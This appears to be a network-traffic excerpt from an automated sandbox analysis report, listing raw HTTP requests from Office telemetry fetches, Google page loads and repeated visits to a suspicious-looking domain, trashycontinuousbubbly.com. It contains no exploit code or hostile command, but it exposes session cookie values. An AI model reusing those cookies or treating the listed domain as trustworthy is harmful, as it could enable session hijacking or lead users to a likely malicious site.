Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /async/hpba?yv=3&cs=0&ei=NF8sZ4qbEPzWi-gP9LDl-Qk&async=_basejs:/xjs/_/js/k%3Dxjs.hd.en_US.Ha-Xy1r_mr4.es5.O/am%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAYAAABAAAAAAAgAAAAAAAAAAoQAQBAAAAQAAAAsAAAQCACAAAAEBAAABAB4lCkAAiQAAAAAAAgAEAAAAAACAABAAAAAAAAAQAEAAAAAAAIAAAAAAAAAgYAAAAAAAAAAAAAAAQAA6AEAAAAAQABAEAAAhoABCCAAAAAAANAHAMEDMKSwAAAAAAAAAAAAAAAACJAgmAsJCAhAAAAAAAAAAAAAAAAAAACRJi5s/dg%3D0/br%3D1/rs%3DACT90oFs2Zqnxfhjbxgu6kzN0zBzbTyqtQ,_basecss:/xjs/_/ss/k%3Dxjs.hd.URsTCE79FvA.L.B1.O/am%3DJFUAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAABNhJAAAMALABBAgAAAAAAAMAAAAAARAAAAAAIACoAAAAAAAABABABIEAgAIAACAwAgCAgAzg_QggAQAAoCAAgABAABBABhoCUQGIAgQAAAAAAAABAAAAgBEAAgEAOgACYAAQCQCA6IEAAAAAAEEAYCYAhoABCAAAAAAAAEAGAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAgAKA/br%3D1/rs%3DACT90oH8F5TBlHJCEu7ijntWqevhy0CRoA,_basecomb:/xjs/_/js/k%3Dxjs.hd.en_US.Ha-Xy1r_mr4.es5.O/ck%3Dxjs.hd.URsTCE79FvA.L.B1.O/am%3DJFUAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAABN5JAABMALABBAgAAAAAAAMAAoQAQRAAAAQAIACsAAAQCACABABEBIEAhAJ4lCkwAiSAgAzg_QggEQAAoCACgABAABBABhoCUQGIAgQAAAIAAAABAAAAgZEAAgEAOgACYAAQCQCA6IEAAAAAQEFAcCYAhoABCCAAAAAAANAHAMEDMKSwAAAAAAAAAAAAAAAACJAgmAsJKAhAAAAAAAAAAAAAAAAAAACRJi5s/d%3D1/ed%3D1/dg%3D0/br%3D1/ujg%3D1/rs%3DACT90oErR92RueQ28tcY4IdxQ4bbOunDyg,_fmt:prog,_id:_NF8sZ4qbEPzWi-gP9LDl-Qk_8&sp_imghp=false&sp_hpep=2&sp_hpte=0&vet=10ahUKEwiKhc39zMmJAxV86wIHHXRYOZ8Qj-0KCBU..i HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: /X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq03GfTpx8M4Jd9pdHvRuun79QVjYMaNk1uYO9gKLxoj3evRLcUYw; NID=518=hx4NEOILpI80dBbgrrGm129tv0HDtsaX_FhoqZ-zD6BREcbkIVxvppaPAYGiTpY--TS0F0o3FbdxHHxs3gzlCnHln9xLDu9L6Yk05bBHfAmNa_v5zrN0y8ofjRA7GUq-F-9_Qu3PrY4ACol0CWWW1Ok71RVqJ2q-ICtiEzq5KefXSrYUsjB3kxK6IvCRB1N5Zn4
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /xjs/_/ss/k=xjs.hd.URsTCE79FvA.L.B1.O/am=JFUAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAABNhJAAAMALABBAgAAAAAAAMAAAAAARAAAAAAIACoAAAAAAAABABABIEAgAIAACAQAgCAgAzg_QggAQAAoCAAgABAABBABhoCUQGIAgQAAAAAAAABAAAAgBEAAgEAOgACYAAQCQCA6IEAAAAAAEEAYCYAhoABCAAAAAAAAEAGAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAgAKA/d=1/ed=1/br=1/rs=ACT90oFhTcC6qqFSdY-IWvX2meQ47EUcpA/m=cdos,hsm,jsa,mb4ZUb,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl,d,csi HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-wow64: ?0sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AEC=AVYB7cq03GfTpx8M4Jd9pdHvRuun79QVjYMaNk1uYO9gKLxoj3evRLcUYw; NID=518=hx4NEOILpI80dBbgrrGm129tv0HDtsaX_FhoqZ-zD6BREcbkIVxvppaPAYGiTpY--TS0F0o3FbdxHHxs3gzlCnHln9xLDu9L6Yk05bBHfAmNa_v5zrN0y8ofjRA7GUq-F-9_Qu3PrY4ACol0CWWW1Ok71RVqJ2q-ICtiEzq5KefXSrYUsjB3kxK6IvCRB1N5Zn4
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-model: ""sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103 HTTP/1.1Host: trashycontinuousbubbly.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-full-version: "117.0.5938.132"sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"sec-ch-ua-model: ""sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: u_pl23778734=1; backurled=dfdceae1749487fe3ee94c1a351e9103
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
